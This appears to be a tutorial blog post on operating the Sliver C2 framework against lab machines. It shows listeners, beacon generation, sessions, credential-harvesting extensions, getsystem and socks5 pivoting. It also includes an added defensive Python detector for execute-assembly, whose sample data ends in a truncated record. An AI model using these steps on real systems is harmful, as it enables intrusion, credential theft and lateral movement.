Now we can run the sliver-server, and it will drop us into a console where we can do basically everything we expect from a C2: generating payloads and beacons, starting listeners, interacting with our beacons, etc.
➜ ./sliver-server
[*] Loaded 21 aliases from disk
[*] Loaded 110 extension(s) from disk
All hackers gain infect
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
[server] sliver >
Multiplayer Mode
Multiplayer mode allows multiple operators (players) to connect to the same Sliver server. You start the server, then start a client that connects to it and gives you the same console. The server can run somewhere remote, but it can also run locally: if you accidentally close the server, the beacons will have trouble connecting back to you, whereas closing the client does no harm. To set up multiplayer mode, we first create a new operator and give it a name, then tell it that the connection will come from localhost:
➜ ./sliver-client
? Select a server: serioton@localhost (2a966044d4c58511)
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 110 extension(s) from disk
Packages
Command Name                  Version   Type        Help
============================= ========= =========== =========================================================================================================================================
bof-roast                     v0.0.2    Extension   Beacon Object File repo for roasting Active Directory
bof-servicemove               v0.0.1    Extension   Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking
c2tc-addmachineaccount        v0.0.9    Extension   AddMachineAccount [Computername] [Password <Optional>]
c2tc-askcreds                 v0.0.9    Extension   Collect passwords using CredUIPromptForWindowsCredentialsName
c2tc-domaininfo               v0.0.9    Extension   enumerate domain information using Active Directory Domain Services
c2tc-kerberoast               v0.0.9    Extension   A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)
[SNIP]
If we want to install a specific package, we can do so by providing the package name:
sliver > armory install rubeus
[*] Installing alias 'Rubeus' (v0.0.24) ... done!
Basic Commands
Set up a listener
To create a listener on port 53, we can use the following command:
sliver > mtls --lport 53
[*] Starting mTLS listener ...
[*] Successfully started job #2
mtls stands for mutual TLS: it is a TCP listener, but the communication over it is encrypted. We can also start http or https listeners:
ID   Name   Protocol   Port    Stage Profile
==== ====== ========== ======= ===============
1    grpc   tcp        31337
2    mtls   tcp        53
Beacons
Generating beacons
To generate a beacon, we can use the generate beacon command. In this case we generate a beacon for 64-bit Windows in .exe format and tell it to connect to our IP:
[*] Generating new windows/amd64 beacon implant binary (30s)
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /tmp/beacon.exe
The -G flag skips Shikata Ga Nai encoding, and --skip-symbols leaves Sliver strings inside the binary. This reduces file size but can lead to detection.
Listing and interacting with beacons
To list all the beacons we have, we can use the beacons command:
sliver > beacons
ID         Name           Transport   Hostname    Username               Operating System   Last Check-In   Next Check-In
========== ============== =========== =========== ====================== ================== =============== ===============
a7b8c0ca   mist-http      http(s)     MS01        MIST\Brandon.Keywarp   windows/amd64      257h38m33s      257h38m2s
7717ce78   axlle          http(s)     MAINFRAME   AXLLE\gideon.hamill    windows/amd64      180h58m49s      180h58m18s
[SNIP]
ede730e4   meow           http(s)     DC1         BLAZORIZED\NU_1055     windows/amd64      11h50m21s       11h49m50s
To interact with a beacon, we can run the use command and give it the beacon ID:
sliver > use ede730e4
[*] Active beacon meow (ede730e4-cc70-4552-9e7f-f4a8fa557615)
sliver (meow) >
Sessions
To turn a beacon into a session, we run the interactive command:
sliver (meow) > interactive
[*] Using beacon's active C2 endpoint: https://10.10.14.8:8443
[*] Tasked beacon meow (8d057a41)
This will create a task that opens an interactive session the next time the beacon checks in:
[*] Session 2b8213e1 ...
We can list sessions using the command sessions. If we want to switch to the context of the session, we can do so by using the following command:
sliver (meow) > use 2b8213e1-5f9e-4d4f-b003-b17e62a239c3
[*] Active session meow (2b8213e1-5f9e-4d4f-b003-b17e62a239c3)
Other useful commands
execute-assembly
With execute-assembly we can run a .NET assembly (DLL or exe) in memory, by spawning a new process (notepad by default) that hosts the .NET-CLR.
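Because execute-assembly hosts the CLR in a freshly spawned native process (notepad by default), a defender can hunt for CLR modules loading into processes that normally never run .NET. The following is an added detection example, not part of the original post and not Sliver code; the Sysmon Event ID 7 (ImageLoad) records are constructed, and the werfault.exe watchlist entry is an assumption.

```python
import json
from collections import defaultdict
from pathlib import PureWindowsPath

# Modules whose load means the process is hosting the .NET CLR.
CLR_MODULES = {"clr.dll", "clrjit.dll", "mscoree.dll", "coreclr.dll"}
# Native binaries with no reason to host the CLR. notepad.exe is the default host
# named in the text; werfault.exe is an assumed extra entry to tune per estate.
NATIVE_WATCHLIST = {"notepad.exe", "werfault.exe"}

# Constructed Sysmon Event ID 7 (ImageLoad) records, one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Windows\\System32\\notepad.exe"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\System32\\ntdll.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\System32\\mscoree.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0002}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0003}", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\System32\\TextShaping.dll"}
{"EventID": 7, "ProcessGuid": "{CONSTRUCTED-0001}", "Image": "C:\\Win
"""

def find_clr_in_native_hosts(lines, watchlist=NATIVE_WATCHLIST):
    """Return {(ProcessGuid, image name): sorted CLR modules} for watchlisted hosts."""
    hits = defaultdict(set)
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank, truncated or corrupt record: skip it, keep hunting
        if not isinstance(ev, dict) or str(ev.get("EventID")) != "7":
            continue  # only image-load events are relevant here
        image = PureWindowsPath(ev.get("Image") or "").name.lower()
        module = PureWindowsPath(ev.get("ImageLoaded") or "").name.lower()
        if image in watchlist and module in CLR_MODULES:
            hits[(ev.get("ProcessGuid"), image)].add(module)
    return {key: sorted(mods) for key, mods in hits.items()}

if __name__ == "__main__":
    for (guid, image), mods in find_clr_in_native_hosts(SAMPLE_EVENTS.splitlines()).items():
        print(f"ALERT {image} {guid} loaded CLR modules: {', '.join(mods)}")
```

The host process is only a default, so the watchlist is a parameter; legitimate .NET hosts such as powershell.exe stay off it to keep the alert volume manageable.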
getsystem
Spawn a new session as NT AUTHORITY\SYSTEM by injecting into a system process when you are already in a high-privileged shell.
ps
List processes and identify running security products such as AVs and EDRs.
socks5
Start a socks5 proxy in your implant with socks5 start. This proxy can then be used with e.g. proxychains to tunnel your tools through the implant into the corporate network.
sideload
Load and execute a shared object (shared library/DLL) in a remote process.
Conclusion
This was a basic intro to Sliver C2, but there’s a lot more you can do with it. Check out the official documentation here: https://sliver.sh/docs. It’s very detailed and explains many things you can do with Sliver.